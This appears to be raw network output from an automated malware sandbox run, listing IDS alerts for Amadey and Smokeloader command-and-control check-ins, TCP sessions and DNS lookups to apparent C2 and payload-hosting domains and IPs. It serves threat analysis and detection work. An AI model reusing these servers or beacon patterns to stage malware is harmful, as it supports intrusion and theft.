                                                                                                                                                                                                192.168.2.3193.56.146.17449746802027700 11/19/22-16:58:49.809680TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.377.232.37.22849727802851815 11/19/22-16:58:32.473174TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184972780192.168.2.377.232.37.228
                                                                                                                                                                                                192.168.2.377.232.37.22849736802851815 11/19/22-16:58:36.653112TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184973680192.168.2.377.232.37.228
                                                                                                                                                                                                192.168.2.3193.56.146.17449752802027700 11/19/22-16:58:52.037330TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.3193.56.146.17449748802027700 11/19/22-16:58:50.604993TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.3193.56.146.17449751802027700 11/19/22-16:58:51.692909TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.3193.56.146.17449749802027700 11/19/22-16:58:51.029782TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.3193.56.146.17449750802027700 11/19/22-16:58:51.366139TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.3193.56.146.174
                                                                                                                                                                                                192.168.2.377.232.37.22849730802851815 11/19/22-16:58:34.840324TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184973080192.168.2.377.232.37.228
                                                                                                                                                                                                192.168.2.3193.56.146.17449745802027700 11/19/22-16:58:49.249164TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.3193.56.146.174
                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Nov 19, 2022 16:57:08.058345079 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.058401108 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.058489084 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.059912920 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.059953928 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.140129089 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.140327930 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.146105051 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.146142006 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.146509886 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.172379017 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.172431946 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.191869020 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.192020893 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.192104101 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.192143917 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.192166090 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.192178011 CET49697443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.192184925 CET4434969723.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.221401930 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.221453905 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.221540928 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.221740961 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.221754074 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.286056995 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.287530899 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.287563086 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.288429022 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.288435936 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.323719025 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.323815107 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.323868036 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.325581074 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.325602055 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:08.325639963 CET49698443192.168.2.323.35.236.109
                                                                                                                                                                                                Nov 19, 2022 16:57:08.325645924 CET4434969823.35.236.109192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.010063887 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.010099888 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.010169983 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.013591051 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.013603926 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.101368904 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.101532936 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.102304935 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.102359056 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.141957045 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.141976118 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.142425060 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.142478943 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143492937 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143502951 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143558979 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143570900 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143579006 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143584967 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143654108 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143670082 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143686056 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143692970 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143727064 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143753052 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143767118 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.143796921 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.298422098 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.298506021 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.298516989 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.298566103 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.317090034 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.317126989 CET44349699131.253.33.200192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:21.317140102 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:21.317197084 CET49699443192.168.2.3131.253.33.200
                                                                                                                                                                                                Nov 19, 2022 16:57:45.591207027 CET804968393.184.220.29192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:45.591434002 CET4968380192.168.2.393.184.220.29
                                                                                                                                                                                                Nov 19, 2022 16:57:49.495512009 CET49687443192.168.2.323.35.237.194
                                                                                                                                                                                                Nov 19, 2022 16:57:49.496159077 CET4968880192.168.2.393.184.220.29
                                                                                                                                                                                                Nov 19, 2022 16:57:49.800894022 CET49689443192.168.2.323.50.106.206
                                                                                                                                                                                                Nov 19, 2022 16:57:49.845913887 CET4434968923.50.106.206192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:49.845969915 CET4434968923.50.106.206192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:49.846116066 CET49689443192.168.2.323.50.106.206
                                                                                                                                                                                                Nov 19, 2022 16:57:49.846200943 CET49689443192.168.2.323.50.106.206
                                                                                                                                                                                                Nov 19, 2022 16:57:50.009917021 CET4969180192.168.2.38.241.126.249
                                                                                                                                                                                                Nov 19, 2022 16:57:50.011009932 CET49690443192.168.2.3204.79.197.200
                                                                                                                                                                                                Nov 19, 2022 16:57:50.011015892 CET4968380192.168.2.393.184.220.29
                                                                                                                                                                                                Nov 19, 2022 16:57:50.644383907 CET4969380192.168.2.393.184.220.29
                                                                                                                                                                                                Nov 19, 2022 16:57:50.644514084 CET4969280192.168.2.38.248.147.254
                                                                                                                                                                                                Nov 19, 2022 16:57:50.644565105 CET4969480192.168.2.3173.222.108.226
                                                                                                                                                                                                Nov 19, 2022 16:57:50.644644976 CET4969580192.168.2.38.248.147.254
                                                                                                                                                                                                Nov 19, 2022 16:57:50.644901037 CET4969680192.168.2.393.184.221.240
                                                                                                                                                                                                Nov 19, 2022 16:57:50.656058073 CET8049694173.222.108.226192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:50.656167030 CET4969480192.168.2.3173.222.108.226
                                                                                                                                                                                                Nov 19, 2022 16:57:50.664350986 CET804969393.184.220.29192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:50.664375067 CET804969693.184.221.240192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:50.664437056 CET4969380192.168.2.393.184.220.29
                                                                                                                                                                                                Nov 19, 2022 16:57:50.664479017 CET4969680192.168.2.393.184.221.240
                                                                                                                                                                                                Nov 19, 2022 16:57:50.668303967 CET80496928.248.147.254192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:50.668392897 CET4969280192.168.2.38.248.147.254
                                                                                                                                                                                                Nov 19, 2022 16:57:50.678309917 CET80496958.248.147.254192.168.2.3
                                                                                                                                                                                                Nov 19, 2022 16:57:50.678441048 CET4969580192.168.2.38.248.147.254
                                                                                                                                                                                                Nov 19, 2022 16:58:01.455888987 CET4970080192.168.2.377.232.37.228
                                                                                                                                                                                                Nov 19, 2022 16:58:01.522022009 CET804970077.232.37.228192.168.2.3
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 19, 2022 16:58:01.160134077 CET192.168.2.38.8.8.80x612Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:01.919708014 CET192.168.2.38.8.8.80x2dc1Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:02.407712936 CET192.168.2.38.8.8.80x831bStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:02.568012953 CET192.168.2.38.8.8.80x7f71Standard query (0)srshf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:03.491904974 CET192.168.2.38.8.8.80xe145Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:03.984349966 CET192.168.2.38.8.8.80xd0c3Standard query (0)iplogger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.147842884 CET192.168.2.38.8.8.80xe423Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.567305088 CET192.168.2.38.8.8.80x1d8cStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.728820086 CET192.168.2.38.8.8.80xf26cStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.891732931 CET192.168.2.38.8.8.80xcd2Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:05.062556028 CET192.168.2.38.8.8.80xd03bStandard query (0)1ecosolution.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:13.176884890 CET192.168.2.38.8.8.80x82ccStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:13.590037107 CET192.168.2.38.8.8.80x2b18Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:13.755465031 CET192.168.2.38.8.8.80x5033Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:14.192063093 CET192.168.2.38.8.8.80x5938Standard query (0)cdn-102.anonfiles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:17.774099112 CET192.168.2.38.8.8.80xc05aStandard query (0)anonfiles.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:17.997459888 CET192.168.2.38.8.8.80x3a04Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:18.159235954 CET192.168.2.38.8.8.80xb498Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.462356091 CET192.168.2.38.8.8.80x34f8Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.622137070 CET192.168.2.38.8.8.80x9f0eStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.784775019 CET192.168.2.38.8.8.80xe54fStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.948282003 CET192.168.2.38.8.8.80x6473Standard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.004631996 CET192.168.2.38.8.8.80xbe99Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.176175117 CET192.168.2.38.8.8.80xced9Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.339287043 CET192.168.2.38.8.8.80x1631Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.508014917 CET192.168.2.38.8.8.80xbf2cStandard query (0)hoteldostyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:32.394125938 CET192.168.2.38.8.8.80xdc9fStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:32.553194046 CET192.168.2.38.8.8.80x2f4fStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:32.742621899 CET192.168.2.38.8.8.80x19a9Standard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:34.758660078 CET192.168.2.38.8.8.80x353cStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:34.962809086 CET192.168.2.38.8.8.80x6752Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.193367004 CET192.168.2.38.8.8.80xa1ecStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.406321049 CET192.168.2.38.8.8.80x9818Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.570811033 CET192.168.2.38.8.8.80xfa0fStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.680458069 CET192.168.2.38.8.8.80x26c7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:36.569705963 CET192.168.2.38.8.8.80x7fe0Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:36.733948946 CET192.168.2.38.8.8.80x5716Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:36.897253990 CET192.168.2.38.8.8.80x8ea9Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.078887939 CET192.168.2.38.8.8.80x2e50Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.255276918 CET192.168.2.38.8.8.80xe432Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.858977079 CET192.168.2.38.8.8.80xbcb5Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:40.124414921 CET192.168.2.38.8.8.80xacaStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:45.903089046 CET192.168.2.38.8.8.80x71c3Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:12.424742937 CET192.168.2.38.8.8.80x1728Standard query (0)2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhqA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:31.145158052 CET192.168.2.38.8.8.80x6676Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:46.107234955 CET192.168.2.38.8.8.80x3551Standard query (0)lentaphoto.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 17:01:06.986499071 CET192.168.2.38.8.8.80x127dStandard query (0)iujdhsndjfks.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Nov 19, 2022 16:58:01.452234030 CET8.8.8.8192.168.2.30x612No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:02.261224031 CET8.8.8.8192.168.2.30x2dc1No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:02.427973986 CET8.8.8.8192.168.2.30x831bNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:02.741633892 CET8.8.8.8192.168.2.30x7f71No error (0)srshf.com108.167.141.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:03.841243029 CET8.8.8.8192.168.2.30xe145No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.001168013 CET8.8.8.8192.168.2.30xd0c3No error (0)iplogger.com148.251.234.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.424365997 CET8.8.8.8192.168.2.30xe423No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.584631920 CET8.8.8.8192.168.2.30x1d8cNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.746968031 CET8.8.8.8192.168.2.30xf26cNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:04.911199093 CET8.8.8.8192.168.2.30xcd2No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:05.103020906 CET8.8.8.8192.168.2.30xd03bNo error (0)1ecosolution.it46.252.148.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:13.446790934 CET8.8.8.8192.168.2.30x82ccNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:13.607109070 CET8.8.8.8192.168.2.30x2b18No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:14.050710917 CET8.8.8.8192.168.2.30x5033No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:14.606645107 CET8.8.8.8192.168.2.30x5938No error (0)cdn-102.anonfiles.com195.96.151.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:17.792520046 CET8.8.8.8192.168.2.30xc05aNo error (0)anonfiles.com45.154.253.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:17.792520046 CET8.8.8.8192.168.2.30xc05aNo error (0)anonfiles.com45.154.253.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:17.792520046 CET8.8.8.8192.168.2.30xc05aNo error (0)anonfiles.com45.154.253.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:18.014646053 CET8.8.8.8192.168.2.30x3a04No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:18.192998886 CET8.8.8.8192.168.2.30xb498No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.481662035 CET8.8.8.8192.168.2.30x34f8No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.641381025 CET8.8.8.8192.168.2.30x9f0eNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.803828001 CET8.8.8.8192.168.2.30xe54fNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:19.966825008 CET8.8.8.8192.168.2.30x6473No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.021636963 CET8.8.8.8192.168.2.30xbe99No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.193491936 CET8.8.8.8192.168.2.30xced9No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.358150005 CET8.8.8.8192.168.2.30x1631No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:23.749830961 CET8.8.8.8192.168.2.30xbf2cNo error (0)hoteldostyk.com43.231.112.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:32.411025047 CET8.8.8.8192.168.2.30xdc9fNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:32.572393894 CET8.8.8.8192.168.2.30x2f4fNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:32.761758089 CET8.8.8.8192.168.2.30x19a9No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:34.777826071 CET8.8.8.8192.168.2.30x353cNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:34.982450008 CET8.8.8.8192.168.2.30x6752No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.212619066 CET8.8.8.8192.168.2.30xa1ecNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.423413038 CET8.8.8.8192.168.2.30x9818No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.594837904 CET8.8.8.8192.168.2.30xfa0fNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.700153112 CET8.8.8.8192.168.2.30x26c7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.700153112 CET8.8.8.8192.168.2.30x26c7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.700153112 CET8.8.8.8192.168.2.30x26c7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:35.700153112 CET8.8.8.8192.168.2.30x26c7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:36.588682890 CET8.8.8.8192.168.2.30x7fe0No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:36.752307892 CET8.8.8.8192.168.2.30x5716No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:36.915503025 CET8.8.8.8192.168.2.30x8ea9No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.099838018 CET8.8.8.8192.168.2.30x2e50No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.275063992 CET8.8.8.8192.168.2.30xe432No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com3.5.21.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com52.216.177.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com52.216.92.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com52.217.99.44A (IP address)IN (0x0001)false
